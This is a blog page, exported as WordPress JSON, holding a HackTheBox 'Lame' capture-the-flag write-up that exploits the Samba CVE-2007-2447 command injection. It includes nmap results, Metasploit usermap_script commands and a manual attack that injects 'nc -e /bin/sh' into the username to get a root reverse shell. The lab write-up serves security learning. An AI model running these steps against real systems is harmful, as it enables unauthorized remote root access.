{"id":129,"date":"2023-02-17T00:52:20","date_gmt":"2023-02-17T00:52:20","guid":{"rendered":"https:\/\/victorcoil.tech\/?page_id=129"},"modified":"2023-02-22T06:41:10","modified_gmt":"2023-02-22T06:41:10","slug":"lame","status":"publish","type":"page","link":"https:\/\/victorcoil.tech\/?page_id=129","title":{"rendered":"Lame"},"content":{"rendered":"\n

“Lame” Report by\u00a0Zekken, HackTheBox, 2\/16\/2023<\/mark><\/p>\n\n\n\n

Tags: Nmap Scan, SMB exploit\/escalation<\/mark><\/p>\n\n\n\n

Vulnerability: CVE-2007-2447<\/a>\u00a0\u201c’Username’ map script’ Command Execution\u201d<\/mark><\/p>\n\n\n\n

System: lame <\/mark>10.129.66.195<\/mark><\/p>\n\n\n\n

Exploit and privilege escalation: This exploit allows for attackers to execute commands remotely after passing unfiltered input via MS-RPC calls towards \/bin\/sh when invoking external scripts. For the exploit to work, the “username map script” would have to be enabled in the smb.conf file.<\/mark><\/p>\n\n\n\n

Remediations: Update Samba service to versions above 3.0.25rc3. If it is not possible to upgrade, a workaround would be to eliminate any external files in the smb.conf file.<\/mark><\/p>\n\n\n\n

Severity:<\/mark> Medium<\/mark><\/p>\n\n\n\n

Reconnaissance:<\/mark><\/p>\n\n\n\n

eu-dedivip-2]\u2500[10.10.14.49]\u2500[htb-zekkenlol@htb-aad1iuxite]\u2500[~]\n\u2514\u2500\u2500\u257c [\u2605]$ nmap -A -Pn 10.129.66.195<\/mark>\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2023-02-17 00:04 GMT\nStats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 99.28% done; ETC: 00:05 (0:00:00 remaining)\nStats: 0:01:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 99.64% done; ETC: 00:05 (0:00:00 remaining)\nStats: 0:02:04 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 99.82% done; ETC: 00:06 (0:00:00 remaining)\nStats: 0:02:36 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\nNSE Timing: About 96.88% done; ETC: 00:07 (0:00:01 remaining)\nNmap scan report for 10.129.66.195\nHost is up (0.075s latency).\nNot shown: 996 filtered tcp ports (no-response)\nPORT    STATE SERVICE     VERSION\n21<\/mark>\/tcp  open  ftp         vsftpd 2.3.4\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 10.10.14.49\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n22<\/mark>\/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\n|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\n139<\/mark>\/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445<\/mark>\/tcp open  netbios-ssn Samba smbd 3.0.20<\/mark>-Debian (workgroup: WORKGROUP)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 2h30m22s, deviation: 3h32m10s, median: 20s\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian<\/mark>)\n|   NetBIOS computer name: \n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2023-02-16T19:05:21-05:00\n|_smb2-time: Protocol negotiation failed (SMB2)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 160.21 seconds<\/code><\/pre>\n\n\n\n
After running the scan above, I used searchsploit on VSFTP 2.3.4. and Samba 3.0.20. <\/mark><\/p>\n\n\n\n
\"\"
searchsploit results<\/mark><\/figcaption><\/figure>\n\n\n\n
Metasploit had modules created for both, but the VSFTP module failed.<\/mark><\/p>\n\n\n\n
 <\/p>\n\n\n\n
msf > use exploit\/multi\/samba\/usermap_script\n\nmsf exploit(usermap_script) > set TARGET 0\nmsf exploit(usermap_script) > show options\n...\nmsf exploit(usermap_script) > set RHOST \n10.129.66.195\nmsf exploit(usermap_script) > set LHOST 10.10.14.49\nmsf exploit(usermap_script) > exploit<\/code><\/pre>\n\n\n\n
Above are the changes I made after loading the Samba module<\/mark><\/p>\n\n\n\n
After running the exploit command, we got a root shell back. After obtaining root, we just had to cd to \/root and run the command below to get the flag and proof<\/mark><\/p>\n\n\n\n
\"\"
Root Flag and Proof<\/mark><\/figcaption><\/figure>\n\n\n\n
 <\/p>\n\n\n\n
Without Metasploit:<\/strong><\/mark><\/p>\n\n\n\n
(I came back because I need to get used to manual exploitation)<\/mark><\/p>\n\n\n\n
New Attacker IP: 10.10.14.32<\/mark><\/p>\n\n\n\n
New Target IP: 10.129.44.112<\/mark><\/p>\n\n\n\n
 <\/p>\n\n\n\n
On the attacker machine we need to configure the \/etc\/samba\/smb.conf file<\/mark><\/p>\n\n\n\n
We simply add the 2 lines on 26 and 27 as seen below<\/mark><\/p>\n\n\n\n
\"\"
smb configuration<\/mark><\/figcaption><\/figure>\n\n\n\n
We can then attemp to login to samba as anonymous on the target machine<\/mark><\/p>\n\n\n\n
 <\/p>\n\n\n\n
\"\"
SMB Anon login<\/mark><\/figcaption><\/figure>\n\n\n\n
We can see above that there is a share name for tmp<\/mark><\/p>\n\n\n\n
We can then connect to that share as seen below<\/mark><\/p>\n\n\n\n
\"\"
tmp help<\/mark><\/figcaption><\/figure>\n\n\n\n
On a seperate terminal, we can do the “searchsploit 3.0.20” command again and then do “searchsploit -m unix\/remote\/16320.rb” to copy the exploit file into our current directory.<\/mark> We can then cat out the file to see its contents. The only think we need from the script is the highlighted section below.<\/mark><\/p>\n\n\n\n
\"\"
copy highlighted section<\/mark><\/figcaption><\/figure>\n\n\n\n
We can then go back to our first terminal and paste the code we copied and add “nc -e \/bin\/sh {attacker_IP} {attacker_port}”. You’ll have to add another single quotation mark, and it has to be the same one as in the beginning else it would not work. This command will connect the remote machine to our attacking machine.<\/mark><\/p>\n\n\n\n
\"\"
netcat to attacker<\/mark><\/figcaption><\/figure>\n\n\n\n
On our second terminal, we can run the command below to listen to incoming connections.<\/mark><\/p>\n\n\n\n
\"\"
attacker netcat listener<\/mark><\/figcaption><\/figure>\n\n\n\n
Upon hitting enter on the smb terminal, we will get a connection on the attacking machine.<\/mark><\/p>\n\n\n\n
\"\"
Access<\/mark><\/figcaption><\/figure>\n\n\n\n
This will grant us with root privilege’s and we are allowed to freely enter the root directory to collect the flag, as well for the flag inside of the user directory.<\/mark><\/p>\n\n\n\n
\"\"
User Flag<\/mark><\/figcaption><\/figure>\n\n\n\n
\"\"
root Flag again<\/mark><\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"
“Lame” Report by\u00a0Zekken, HackTheBox, 2\/16\/2023 Tags: Nmap Scan, SMB exploit\/escalation Vulnerability: CVE-2007-2447\u00a0\u201c’Username’ map script’ Command Execution\u201d System: lame 10.129.66.195 Exploit and privilege escalation: This exploit allows for attackers to execute commands remotely after passing unfiltered input via MS-RPC calls towards \/bin\/sh when invoking external scripts. For the exploit to work, the “username map script” would have to be enabled in the smb.conf file. Remediations: Update Samba service to versions above 3.0.25rc3. If it is not possible to upgrade, a workaround would be to eliminate any external files in the smb.conf file. Severity: Medium Reconnaissance: After running the scan above, I<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"class_list":["post-129","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=129"}],"version-history":[{"count":4,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/129\/revisions"}],"predecessor-version":[{"id":155,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/129\/revisions\/155"}],"wp:attachment":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}